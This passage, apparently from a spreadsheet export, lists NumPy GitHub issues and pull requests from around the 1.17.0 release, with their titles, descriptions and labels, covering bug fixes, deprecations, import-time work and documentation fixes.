    <t>BUG: avx2_scalef_ps must be static</t>
  </si>
  <si>
    <t>This is related to:_x000D_
_x000D_
https://github.com/numpy/numpy/issues/14087_x000D_
https://github.com/numpy/numpy/pull/14091_x000D_
_x000D_
Allows for `nulp` fuss when comparing results of `np.exp`/`np.log` on strided vs. unit-strided float32 arrays.</t>
  </si>
  <si>
    <t>TST: Allow fuss in testing strided/non-strided exp/log loops</t>
  </si>
  <si>
    <t xml:space="preserve">ndarray.clip is already just a wrapper for the ufunc, so there is no need to do type-specific wrapping here any more_x000D_
_x000D_
Fixes #14140 _x000D_
_x000D_
Backportable via the web UI_x000D_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</si>
  <si>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Remove the broken clip wrapper</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.ma']</t>
  </si>
  <si>
    <t xml:space="preserve">Due to an exception being in flight. We shouldn't be reporting errors via print anyway_x000D_
_x000D_
Introduced in 3d730002b1428cce568bcf6fcda0e0df76c5d960, so not a regression._x000D_
_x000D_
Related to gh-14142_x000D_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</si>
  <si>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Remove stray print that causes a SystemError on python 3.7 .</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>_x000D_
Due to implicit conversion of int. Since `total_seconds` returns a python `float`, its easiest to convert to a C float and do the int conversion there_x000D_
_x000D_
Fixes gh-14077</t>
  </si>
  <si>
    <t>BUG: Fix DeprecationWarning in python 3.8</t>
  </si>
  <si>
    <t xml:space="preserve">### Reproducing code example:_x000D_
_x000D_
```python_x000D_
In [1]: import numpy as np                                                                                                                                                 _x000D_
_x000D_
In [2]: np.__version__                                                                                                                                                     _x000D_
Out[2]: '1.17.0'_x000D_
_x000D_
In [3]: a = np.arange(10)                                                                                                                                                  _x000D_
_x000D_
In [4]: m = np.ma.MaskedArray(a, mask=[0, 1] * 5)                                                                                                                          _x000D_
_x000D_
In [5]: np.clip(m, 0, 5)                                                                                                                                                   _x000D_
Out[5]: _x000D_
masked_array(data=[0, --, 2, --, 4, --, 5, --, 5, --],_x000D_
             mask=[False,  True, False,  True, False,  True, False,  True,_x000D_
                   False,  True],_x000D_
       fill_value=999999)_x000D_
_x000D_
In [6]: m                                                                                                                                                                  _x000D_
Out[6]: _x000D_
masked_array(data=[0, --, 2, --, 4, --, 6, --, 8, --],_x000D_
             mask=[False,  True, False,  True, False,  True, False,  True,_x000D_
                   False,  True],_x000D_
       fill_value=999999)_x000D_
_x000D_
In [7]: np.clip(m, 0, 5, m)                                                                                                                                                _x000D_
Out[7]: _x000D_
masked_array(data=[0, 1, 2, 3, 4, 5, 5, 5, 5, 5],_x000D_
             mask=False,_x000D_
       fill_value=999999)_x000D_
_x000D_
In [8]: m                                                                                                                                                                  _x000D_
Out[8]: _x000D_
masked_array(data=[0, 1, 2, 3, 4, 5, 5, 5, 5, 5],_x000D_
             mask=False,_x000D_
       fill_value=999999)_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
Inconsistency of `np.clip` with `MaskedArray` when using output argument. I.e.:_x000D_
_x000D_
```python_x000D_
np.clip(m, 0, 5)_x000D_
np.clip(m, 0, 5, m)_x000D_
```_x000D_
_x000D_
these two lines produce different results._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python: 3.7.3_x000D_
Numpy: 1.17.0_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inconsistency of np.clip with MaskedArray when using output argument</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.ma', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>A related effect of this change is that assigning a ragged list (but still of correct number of values) to a slice no longer works, as shown in this example, extracted from [Matplotlib's tests](https://travis-ci.org/matplotlib/matplotlib/jobs/564132739#L2507):_x000D_
```python_x000D_
points = np.array([[1, 2], [3, 6]])_x000D_
_x000D_
xlim = points[:, 0]_x000D_
ylim = points[:, 1]_x000D_
edge_size = max(np.diff(xlim), np.diff(ylim))_x000D_
_x000D_
interval = [xlim[0], xlim[0] + edge_size]_x000D_
_x000D_
points[:, 0] = interval_x000D_
# print(repr(points)) formerly gave:_x000D_
# array([[1, 2],_x000D_
#        [5, 6]])_x000D_
```_x000D_
fails with a `ValueError` because the first element is a scalar and the second element is an array of length one._x000D_
_x000D_
I wrote a fix for this, but [a question](https://github.com/matplotlib/matplotlib/pull/14891#discussion_r307579312) did come up for whether this was an intended change?_x000D_
_x000D_
_Originally posted by @QuLogic in https://github.com/numpy/numpy/pull/13913#issuecomment-515569002_</t>
  </si>
  <si>
    <t>BUG: New ragged array message has false positives</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'priority: high']</t>
  </si>
  <si>
    <t xml:space="preserve">Would it be possible to add (Port) SSPipe as a submodule in numpy?_x000D_
_x000D_
https://pypi.org/project/sspipe/_x000D_
https://sspipe.github.io/_x000D_
https://github.com/sspipe/sspipe_x000D_
_x000D_
It is a great feature, but if we want to use it as standard python programming syntax, it should be part of a well-supported package such as numpy. </t>
  </si>
  <si>
    <t>Feature Request: Add SSPipe as a Submodule</t>
  </si>
  <si>
    <t xml:space="preserve">- Update .mailmap_x000D_
- Update 1.17.0-notes.rst_x000D_
- Update 1.17.0-changelog.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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MAINT: Update master after 1.17.0 release.</t>
  </si>
  <si>
    <t xml:space="preserve">[skip ci]_x000D_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</si>
  <si>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Update mailmap and changelog for 1.17.0</t>
  </si>
  <si>
    <t>Fancy indexing on an array creates a copy. If the array is read-only, the copy is writeable and owns its data._x000D_
```python_x000D_
a = np.array([1,2,3])_x000D_
a.setflags(write=False)_x000D_
b = a[[1,2]]_x000D_
b.flags_x000D_
&gt;&gt;&gt;  C_CONTIGUOUS : True_x000D_
     F_CONTIGUOUS : True_x000D_
     OWNDATA : True  #_x000D_
     WRITEABLE : True  #_x000D_
     ALIGNED : True_x000D_
     WRITEBACKIFCOPY : False_x000D_
     UPDATEIFCOPY : False_x000D_
```_x000D_
However fancy indexing on a memmap creates a read-only copy._x000D_
```python_x000D_
m = np.memmap('tmp', dtype='int', mode='w+', shape=(3,))_x000D_
m[:] = a[:]_x000D_
m = np.memmap('tmp', dtype='int', mode='r', shape=(3,))_x000D_
b = m[[1,2]]_x000D_
b.flags _x000D_
&gt;&gt;&gt;  C_CONTIGUOUS : True_x000D_
     F_CONTIGUOUS : True_x000D_
     OWNDATA : False  #_x000D_
     WRITEABLE : False  #_x000D_
     ALIGNED : True_x000D_
     WRITEBACKIFCOPY : False_x000D_
     UPDATEIFCOPY : False_x000D_
```_x000D_
And it seems that it does not own its data, but then who is its base ?</t>
  </si>
  <si>
    <t>Fancy indexing on read-only memmap creates a read-only copy</t>
  </si>
  <si>
    <t>['00 - Bug', 'defunct — difficulty: Intermediate']</t>
  </si>
  <si>
    <t xml:space="preserve">permutation and shuffle functions in numpy.random leak memory. On different test machines it either caused MemoryError, script termination with SIGKILL from OS, or produced no errors but the script consumed huge amount of  memory (~ 5Gb). _x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
for k in range(1000):_x000D_
    ind = np.random.permutation(44100 * 1000)_x000D_
```_x000D_
or _x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
for k in range(1000):_x000D_
    x = np.empty(44100 * 1000)_x000D_
    np.random.shuffle(x)_x000D_
```_x000D_
Start `top` and watch the memory grow._x000D_
_x000D_
### Error message:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "leak_memory.py", line 5, in &lt;module&gt;_x000D_
    ind = np.random.permutation(44100 * 1000)_x000D_
  File "mtrand.pyx", line 4917, in mtrand.RandomState.permutation_x000D_
MemoryError_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
1.16.3 3.7.1 (default, Oct 22 2018, 11:21:55) _x000D_
[GCC 8.2.0]_x000D_
_x000D_
OS: Ubuntu 18.04 (Error message and SIGKILL)_x000D_
       Windows 10 (huge memory consumption)_x000D_
</t>
  </si>
  <si>
    <t>memory leak in random.permutation and random.shuffle</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.random', 'priority: high']</t>
  </si>
  <si>
    <t>Fix typo by removing "of" of "of with"</t>
  </si>
  <si>
    <t>MAINT: Fix small typo in quickstart docs</t>
  </si>
  <si>
    <t xml:space="preserve">Resolves #14123 </t>
  </si>
  <si>
    <t>MAINT: Use equality instead of identity check with literal</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.ma']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14087._x000D_
_x000D_
For ufunc where results are floating point arrays allow for some fuss (currently 4*machine epsilon, up for debates) in comparing results evaluated on contiguous and non-contiguous arrays of the same values. _x000D_
_x000D_
@charris </t>
  </si>
  <si>
    <t>MAINT: adjustments to test_ufunc_noncontigous</t>
  </si>
  <si>
    <t>The doctest should have a blank line above and below it._x000D_
_x000D_
This fixes the generated documentation.</t>
  </si>
  <si>
    <t>DOC: Add blank line above doctest for intersect1d</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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1) Added a validation test suite to confirm accuracy of exp. While running this test suite, it caught a bug in AVX based exp function where denormals were being suppressed. There is a commit to fix that bug as well._x000D_
2) Working on adding validation tests for log, sin and cos as well. </t>
  </si>
  <si>
    <t>BUG, TEST: Adding validation test suite to validate float32 exp</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14048 for wheels builds._x000D_
_x000D_
The current tests fail in the manylinux1 environment used to build_x000D_
the release wheels, so mark as xfail for now._x000D_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</si>
  <si>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Mark umath accuracy test xfail.</t>
  </si>
  <si>
    <t>gcd/lcm was added in https://github.com/numpy/numpy/commit/7ab0f15250f5965a1e47e419597ca358e9b31a75_x000D_
_x000D_
I believe it was an oversight to not add the function definitions to npy_math.h, which resulted in an **implicit function declaration** for me which means the result of gcd is truncated to 32 bits (which is correct for the vast majority of results) but not all._x000D_
_x000D_
Luckily the [gcd_overflow test](https://github.com/numpy/numpy/blob/master/numpy/core/tests/test_umath.py#L2480) caught this. Unfortantely I had **-w** on and didn't see the **-Wimplicit-function-declaration** error and the test case result is 2^64 which was truncated to 0 so it took quite a bit of my time to debug. _x000D_
_x000D_
I'm not sure if this should be labelled BLD, ENH, or MAINT. _x000D_
I'm also not sure where in the file you'd like these sorted.</t>
  </si>
  <si>
    <t>BUG: Add gcd/lcm definitions to npy_math.h</t>
  </si>
  <si>
    <t xml:space="preserve">### Preamble_x000D_
_x000D_
In the [pymc3 package](https://docs.pymc.io/) we implemented a series of distributions. One of such distributions is the [`Categorical` distribution](https://en.wikipedia.org/wiki/Categorical_distribution), where we have an ndarray, `p`, that represents the probabilities of getting one of `K` categories (where `K` goes from `0` to `p.shape[-1]-1`)._x000D_
_x000D_
Under some circumstances, its good to stack many independent categorical distributions on the same distribution instance (i.e. to write down a multidimensional categorical distribution). In these cases, `p.ndim` is larger than 1._x000D_
_x000D_
PyMC3 focuses on doing MCMC, and to accomplish that, we write down a distribution's log probability. To fix our implementation on multidimensional categorical distributions, [we recently switched to use `choose` instead of advanced indexing](https://github.com/pymc-devs/pymc3/pull/3563) (we actually use theano, but `theano.tensor.choose` later dispatches to `numpy.choose`). However we encountered the following [issue](https://github.com/pymc-devs/pymc3/issues/3567) which can be reproduced by the simple following code:_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a = np.random.randint(0, 1000, size=(8, 3, 4))_x000D_
&gt;&gt;&gt; b = np.random.rand(1000, 3, 4) _x000D_
&gt;&gt;&gt; np.choose(a, b)_x000D_
_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-8-f1c91ffb39bc&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.choose(b, a)_x000D_
_x000D_
~/anaconda3/lib/python3.6/site-packages/numpy/core/fromnumeric.py in choose(a, choices, out, mode)_x000D_
    420 _x000D_
    421     """_x000D_
--&gt; 422     return _wrapfunc(a, 'choose', choices, out=out, mode=mode)_x000D_
    423 _x000D_
    424 _x000D_
_x000D_
~/anaconda3/lib/python3.6/site-packages/numpy/core/fromnumeric.py in _wrapfunc(obj, method, *args, **kwds)_x000D_
     54 def _wrapfunc(obj, method, *args, **kwds):_x000D_
     55     try:_x000D_
---&gt; 56         return getattr(obj, method)(*args, **kwds)_x000D_
     57 _x000D_
     58     # An AttributeError occurs if the object does not have_x000D_
_x000D_
ValueError: Need at least 1 and at most 32 array objects._x000D_
_x000D_
In [2]: a = np.random.rand(1000, 3, 4)_x000D_
_x000D_
In [3]: b = np.random.randint(0, 1000, size=(8, 3, 4))_x000D_
_x000D_
In [4]: np.choose(a, b)_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-11-a1dc619e7b2a&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.choose(a, b)_x000D_
_x000D_
~/anaconda3/lib/python3.6/site-packages/numpy/core/fromnumeric.py in choose(a, choices, out, mode)_x000D_
    420 _x000D_
    421     """_x000D_
--&gt; 422     return _wrapfunc(a, 'choose', choices, out=out, mode=mode)_x000D_
    423 _x000D_
    424 _x000D_
_x000D_
~/anaconda3/lib/python3.6/site-packages/numpy/core/fromnumeric.py in _wrapfunc(obj, method, *args, **kwds)_x000D_
     54 def _wrapfunc(obj, method, *args, **kwds):_x000D_
     55     try:_x000D_
---&gt; 56         return getattr(obj, method)(*args, **kwds)_x000D_
     57 _x000D_
     58     # An AttributeError occurs if the object does not have_x000D_
_x000D_
ValueError: Need at least 1 and at most 32 array objects._x000D_
```_x000D_
_x000D_
### Feature request_x000D_
_x000D_
It would be really great if this 32 array objects limit were lifted only in the case in which the supplied `choices` parameter was an `ndarray` instance and had a non-object dtype (i.e. `float64`, `int64` or others like those)._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
python version: 3.6.7 | packaged by conda-forge | (default, Feb 26 2019, 03:50:56) [GCC 7.3.0]_x000D_
numpy version: 1.16.1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Mention `take_along_axis` in `choose`</t>
  </si>
  <si>
    <t xml:space="preserve">Scipy has now switched to an evolved version of the `pocketfft` library, which provides (among a few other new features) better performance for multi-dimensional transforms and full support for single and long double precision. The new `scipy.fft` module also provides an interface that is closer to `numpy.fft` than `scipy.fftpack` was._x000D_
_x000D_
It may be profitable if scipy and numpy could actually use one and the same code for their FFTs, but I'm not sure if this is possible, since `pypocketfft` is C++ and relies on `pybind11` for interfacing with Python._x000D_
_x000D_
Please feel free to close if this can't be done for whatever reason; I just wanted to put the suggestion on the table._x000D_
</t>
  </si>
  <si>
    <t>Synchronize FFT implementation with scipy?</t>
  </si>
  <si>
    <t>['component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">fixed reST formatting typo in changelog/README.md. _x000D_
Looked like there was an extra pair of    ` ``` `_x000D_
_x000D_
Before:_x000D_
![before](https://user-images.githubusercontent.com/43701530/61873911-adac7000-af04-11e9-8d68-f7297b11ea68.png)_x000D_
_x000D_
After:_x000D_
![after](https://user-images.githubusercontent.com/43701530/61873926-b604ab00-af04-11e9-8201-6325649a13e1.png)_x000D_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</si>
  <si>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fix markup of news fragment readme</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: towncrier']</t>
  </si>
  <si>
    <t xml:space="preserve">In response to the lowest bullet point of Issue #14112. _x000D_
A typing error of "directory = "coompatibility"" changed to "directory = "compatibility"". Present at Line 37._x000D_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</si>
  <si>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Fix typo in pyproject.toml</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11521 _x000D_
Removes long deprecated functions `np.rank`, `np.ma.rank`_x000D_
</t>
  </si>
  <si>
    <t>DEP: Deprecate np.rank, np.ma.rank</t>
  </si>
  <si>
    <t>Towncrier while working, currently creates somewhat malformed outputs. In principle we can just fix it up manually, but I am working on fixing things upstream as well:_x000D_
_x000D_
- [ ] Do not enforce bullet point style for segments (there is a manual indent, maybe to support manual wrapping, since jinja2 supports both of these). *(https://github.com/hawkowl/towncrier/pull/158)*_x000D_
- [ ] Title cannot be a heading with `====` style above and below, becuase the title is not jinja2 templated like the rest. *(https://github.com/hawkowl/towncrier/pull/158)*_x000D_
_x000D_
There are also the small issue:_x000D_
_x000D_
- [ ] Incarnation with `--version NumPy` adds an extra space *(Mostly requires fixup for docs, it should be only `--version=1.XX.x`, the name might as well be hardcoded in the template)*_x000D_
- [ ] The `compatibility` section has a typo. *(fixed on local branch, but that requires towncrier updates)*_x000D_
- [ ] Move `changelog` folder to a better place, especially since `doc/changelog` exists.</t>
  </si>
  <si>
    <t>MAINT: Tracking issue for towncrier usage</t>
  </si>
  <si>
    <t>Fixes #14099 by removing start of sentence "Equivalent to"</t>
  </si>
  <si>
    <t>DOC: fix typo in c-api/array.rst doc</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: Documentation']</t>
  </si>
  <si>
    <t>This reverts commit 71fc59d587016d6f36007ba06e074d4d4a6b483d_x000D_
which was part of gh-13399 and the followup commit_x000D_
ba53a63ee9be7a7bad7685b051a0ef984caa321e from gh-13663._x000D_
_x000D_
The issue is that we mix Sequence protocol and `__array__` usage_x000D_
when coercing arrays. It seems easiest to revert this for the 1.17.x release_x000D_
and make a larger breaking change in the 1.18.x release cycle._x000D_
Since this only occurs for stranger array-likes. This revert is limited_x000D_
to the 1.17.x branch for now._x000D_
_x000D_
---_x000D_
_x000D_
@charris do you think such a revert is feasible? I have removed the benchmark and test changes from the revert. The PR was a bit of nice maintenance as well, but it seems to me that full revert is "simpler".</t>
  </si>
  <si>
    <t>REV: "ENH: Improved performance of PyArray_FromAny for sequences of array-like"</t>
  </si>
  <si>
    <t xml:space="preserve">The variable `no_castable_output` is passed by a pointer to the `ufunc_loop_matches` function in which its value is read at https://github.com/numpy/numpy/blob/3251dc2bdd322e7fe3cf80d8337f0d4624922321/numpy/core/src/umath/ufunc_type_resolution.c#L1709_x000D_
_x000D_
Maybe I am missing something, but it shouldn't hurt._x000D_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</si>
  <si>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initialize variable that is passed by pointer</t>
  </si>
  <si>
    <t>MAINT: remove duplicate variable assignments</t>
  </si>
  <si>
    <t>Following #14061._x000D_
_x000D_
Provides a clearer error message if padding with a stat_length=0 is the cause of an exception (mean and median return nan with warnings) as well as tests covering this behavior._x000D_
_x000D_
This shouldn't change the behavior of pad except for the content of the raised ValueError._x000D_
_x000D_
&lt;strike&gt;I'm not really happy with the addition of the try-except-block inside the loop as it's starting to look like spaghetti code. I don't think the clearer error message is worth that but I'll let you decide.&lt;/strike&gt; In any case I think the new tests are useful to pin this behavior down.</t>
  </si>
  <si>
    <t>MAINT: Clearer error message while padding with stat_length=0</t>
  </si>
  <si>
    <t>Related to #11521 _x000D_
@seberg Please review.</t>
  </si>
  <si>
    <t>DEP: Deprecate PyArray_FromDimsAndDataAndDescr, PyArray_FromDims</t>
  </si>
  <si>
    <t>['07 - Deprecation', '63 - C API changes']</t>
  </si>
  <si>
    <t>In `numpy/doc/source/reference/c-api/array.rst` ([line 3380](https://github.com/numpy/numpy/blame/691e6dbe1fd70c7638daf3ab38e877419babeed2/doc/source/reference/c-api/array.rst#L3380)), there is an "Equivalent to", but the sentence has not been completed.</t>
  </si>
  <si>
    <t>Typo in c-api/array.rst doc</t>
  </si>
  <si>
    <t xml:space="preserve">See here:_x000D_
https://github.com/numpy/numpy/pull/14083_x000D_
_x000D_
Just testing on CIs for now._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Import time: Avoid importing python.Threading</t>
  </si>
  <si>
    <t>['03 - Maintenance', '25 - WIP', 'component: numpy.core', 'component: numpy.random']</t>
  </si>
  <si>
    <t>See discussion here._x000D_
_x000D_
Just testing with CIs for now._x000D_
_x000D_
https://github.com/numpy/numpy/pull/14083_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [ea965e4c]       [1a42f13e]_x000D_
     &lt;master&gt;         &lt;import_time_tester&gt;_x000D_
-       100±0.6ms       90.7±0.5ms     0.90  bench_import.Import.time_numpy_x000D_
```</t>
  </si>
  <si>
    <t>MAINT: Lazy import testing on python &gt;=3.7</t>
  </si>
  <si>
    <t xml:space="preserve">This is admittedly a really small gain._x000D_
I think it only avoid the import of hashlib._x000D_
_x000D_
Feel free to just shut this one down if it isn't worth your keystrokes._x000D_
_x000D_
I think the gain here is on the order of 1ms. Hard to measure._x000D_
_x000D_
It avoid the import of `hashlib` and `hmac`_x000D_
_x000D_
![image](https://user-images.githubusercontent.com/90008/61760294-18409d00-ad99-11e9-8589-42be3ce2a027.png)_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Improve import time: Avoid importing secrets</t>
  </si>
  <si>
    <t>I got bit by this on NEP 28 (thanks for the super helpful comment @charris !).  _x000D_
_x000D_
This adds the special dash + comment to the template.</t>
  </si>
  <si>
    <t>MAINT: Improve NEP template</t>
  </si>
  <si>
    <t xml:space="preserve">pip will itself call setup.py install with the rights options._x000D_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</si>
  <si>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Use `pip install .` where possible instead of calling setup.py</t>
  </si>
  <si>
    <t xml:space="preserve">Numpy 1.17 has added `numpy.core.tests.test_ufunc.py::test_ufunc_noncontiguous`, which insists that result of ufunc applied to an array be bit-wise identical, using `assert_equal` for strided and non-strided loops._x000D_
_x000D_
These tests might fail (as they do in Intel patched NumPy), if different implementations of universal function loop are used depending on the stride._x000D_
_x000D_
For example:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; svml_res = np.arccosh(np.arange(1,7, dtype='f'))_x000D_
&gt;&gt;&gt; libm_res = np.array([np.arccosh(x) for x in np.arange(1,7, dtype='f')], 'f')_x000D_
&gt;&gt;&gt; svml_res == libm_res_x000D_
array([ True,  True,  True,  True,  True, False])_x000D_
&gt;&gt;&gt; svml_res - libm_res_x000D_
array([0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,_x000D_
       0.0000000e+00, 2.3841858e-07], dtype=float32)_x000D_
&gt;&gt;&gt; (svml_res - libm_res)[-1]_x000D_
2.3841858e-07_x000D_
&gt;&gt;&gt; np.finfo('f').eps_x000D_
1.1920929e-07_x000D_
``` _x000D_
_x000D_
The failure is at 2 epsilons of the type._x000D_
_x000D_
So this test essentially precludes using different implementations for different strides._x000D_
_x000D_
How do you feel about relaxing `np.testing.assert_equal` to `np.testing.assert_almost_equal` with absolute/relative tolerance set to a multiple of type's epsilon ?_x000D_
_x000D_
N.B.: OpenCL 2.0 standard mandates of implementation to uniformly be withing several ULPs of the true value._x000D_
</t>
  </si>
  <si>
    <t>BUG: `test_ufunc_noncontiguous` too restrictive</t>
  </si>
  <si>
    <t>This NEP is a proposing a standard policy for the community to determine when we age-out support for old versions of Python.  This came out of in-person discussions at SciPy earlier in July and scattered discussion across github.  This is being proposed by maintainers from Matplotlib, scikit-learn,_x000D_
IPython, Jupyter, yt, SciPy, NumPy, and scikit-image._x000D_
_x000D_
TL;DR:_x000D_
_x000D_
We propose only supporting versions of Python initially released in the preceding 42 months of a major or minor release of any of our projects.</t>
  </si>
  <si>
    <t>ENH: Propose standard policy for dropping support of old Python versions</t>
  </si>
  <si>
    <t>['01 - Enhancement', '25 - WIP', 'component: NEP']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13964._x000D_
_x000D_
Added new recfunctions to __all__ , and made a few fixes in the docstrings of the functions._x000D_
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</si>
  <si>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['00 - Bug', '04 - Documentation', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">This was not meant to be posted here with no note. I think i missed which fork I was targetting. I wanted to create a summary of the changes for discussion._x000D_
_x000D_
Going to repost my original comments here for discussion. xref: https://github.com/numpy/numpy/issues/11457#issuecomment-514030619_x000D_
_x000D_
As stated, I think blaming numpy.testing alone is probably misleading._x000D_
_x000D_
There are quite a few other modules that take time._x000D_
_x000D_
One of those "innocent" looking ones is:_x000D_
* `platform`. The only location where it is truely necessary is to create the variable `IS_PYPY`. That said, it seems to import all of `Threading`, which accounts for a large chunk of the import time. If detecting `PyPy` was hard and inconvenient, it might be justified, but in fact, it is as easy as `"PyPy" in sys.version`._x000D_
* `Threading` is also imported for a `Lock` in the random module, which is a Cython module. I made a proof of concept where I imported `fastrlock` (ok, I know that we don't need reentrant locks, but I wanted something that look API compatible easily). The random modules are already cython, and thus this is a "small micro optimization" that doesn't add any cost. We can use the same `locking` primitives that fastrlock uses to speed up the whole module._x000D_
* `secrets` is quite slow to import. Since we only need it for a few random bits, we can import what we need ourselves. https://github.com/numpy/numpy/pull/14083/files#diff-89944aec176617da993c6de4d9529348R251_x000D_
* As stated, by other `UnitTest` does take quite a bit of time. The warning in the comments indicates that it is likely only used by packages, that can find the relevant documentation to test numpy as needed._x000D_
* `pickle` is quite slow too. `pickle` is a strange one, since many other libraries will import it, but from what I found by removing it, almost everywhere it was used except for `numpy.core._methods`, it is associated with a warning. Not sure if the omission of the warning there was an honest mistake or an API decision. But avoiding the import of pickle can speed things up for those that don't need it. _x000D_
https://github.com/numpy/numpy/blob/master/numpy/core/_methods.py#L241_x000D_
* `textwrap` is not a trivial import. It is only used in 2 location where it makes the code "indented to according to a certain style". It doesn't seem worthwhile to use it to sanitize static strings. https://github.com/numpy/numpy/blob/master/numpy/core/overrides.py#L166 https://github.com/numpy/numpy/blob/master/numpy/ma/core.py#L2448_x000D_
* `Decimal` takes time, but there isn't much you can do other than ruining code style._x000D_
* `pathlib` is also not a trivial import. In fact the one location where it is imported directly has a comment stating that it should not be the prefered method. https://github.com/numpy/numpy/blob/master/numpy/compat/py3k.py#L105_x000D_
* `shutils` can be lazy imported in the two locations where it is used._x000D_
_x000D_
While some of these might be `micro optimizations`, I think many might be well justified to help improve numpy's import time in the near term especially seeing as these optimizations hit code that is considered `soft deprecated` or `convenient for compatibility reasons that no longer exist (i.e. python 2 has been dropped)`._x000D_
_x000D_
I'm going to refer to numpy's own benchmarks regarding the amount of time it takes for numpy to import:_x000D_
https://pv.github.io/numpy-bench/#bench_import.Import.time_numpy_x000D_
_x000D_
According to those, on some computer somewhere, it might take about 900 ms to import numpy up from 700 ms in recent versions. While the benchmarks running on my laptop are not that slow, it also isn't the cheapest laptop around._x000D_
_x000D_
Here is a PR made to my own branch showing the changes in case anybody wanted to glance at them: https://github.com/numpy/numpy/pull/14083_x000D_
_x000D_
And an image of the improvements as I made the changes._x000D_
![image](https://user-images.githubusercontent.com/90008/61677077-355b6a00-accc-11e9-95c1-5d2c9efd9986.png)_x000D_
_x000D_
I'm happy to cleanup the changes as required._x000D_
Other relevant discussion here:_x000D_
https://news.ycombinator.com/item?id=16978932 linking to a post where python core devs are worried about import time as well._x000D_
_x000D_
I get that in many application the caller will likely import `Threading`, or `pathlib` or `platform` themselves, and thus their application will not see the overall benefit or removing all 3 imports, but they might see the slight improvement in removing one of the many dependencies that aren't critical, or, at the very least, they might have a nice way of lazy importing them themselves._x000D_
_x000D_
_x000D_
# Summary_x000D_
_x000D_
The commits here are kinda my only reference. I really want to keep them until a consensus is reached on what should be kept and what shouldn't be:_x000D_
_x000D_
_x000D_
| Library                          | Performance cost | proposed "fix"           | eric-wieser       |_x000D_
| -------------------------------- | ---------------- | ------------------------ | ----------------- |_x000D_
| total master                     | 100 ms  on a good laptop, 1s according to official benchmarks         |                          |                   |_x000D_
| python core libraries      | 10%              |                          |                   |_x000D_
| platform https://github.com/numpy/numpy/pull/14098                        | 6%               | avoid (1 line vendor)      |                   |_x000D_
| np.testing https://github.com/numpy/numpy/pull/14097                      | 9.5%             | remove                   |                   |_x000D_
| textwrap https://github.com/numpy/numpy/pull/14095                        | 3.4%             | avoid                    | vendor `deindent` |_x000D_
| pickle                           | 2%               | avoid (deprecated)       |                   |_x000D_
| pathlib  https://github.com/numpy/numpy/pull/14093                        | 2%               | avoid (remove after 3.6) |                   |_x000D_
| datetime                         | 1%               | don't know               |                   |_x000D_
| secrets https://github.com/numpy/numpy/pull/14094                         | 3%               | 1 line vendor              |                   |_x000D_
| threading (imported by platform) https://github.com/numpy/numpy/pull/14098 | 2%               | avoid                    |                   |_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>WIP, MAINT: Improve import time</t>
  </si>
  <si>
    <t>['03 - Maintenance', '25 - WIP']</t>
  </si>
  <si>
    <t>For writing arrays, only the ``write`` method is necessary._x000D_
_x000D_
I had code that was broken by this check and had to introduce a fake `read` method for it to work: https://github.com/luispedro/jug/blob/b32f4389acd1c3edf1a6a593799e853ded7849a2/jug/backends/encode.py#L88</t>
  </si>
  <si>
    <t>BUG: Fix file-like object check when saving arrays</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14059: Test if compiler supports _builtin_supports("avx512f") before calling it_x000D_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</si>
  <si>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build issue on icc 2016</t>
  </si>
  <si>
    <t xml:space="preserve">Running tests with python3.8b2+ on travis fails with two instead of one warning for TestDatetime64Timezone_x000D_
```_x000D_
E           AssertionError: 2 warnings found but 1 expected._x000D_
E           {message : DeprecationWarning('parsing timezone aware datetimes is deprecated; this will raise an error in the future'), category : 'DeprecationWarning', filename : '/home/travis/build/numpy/numpy/builds/venv/lib/python3.8/site-packages/numpy/core/tests/test_deprecations.py', lineno : 89, line : None}_x000D_
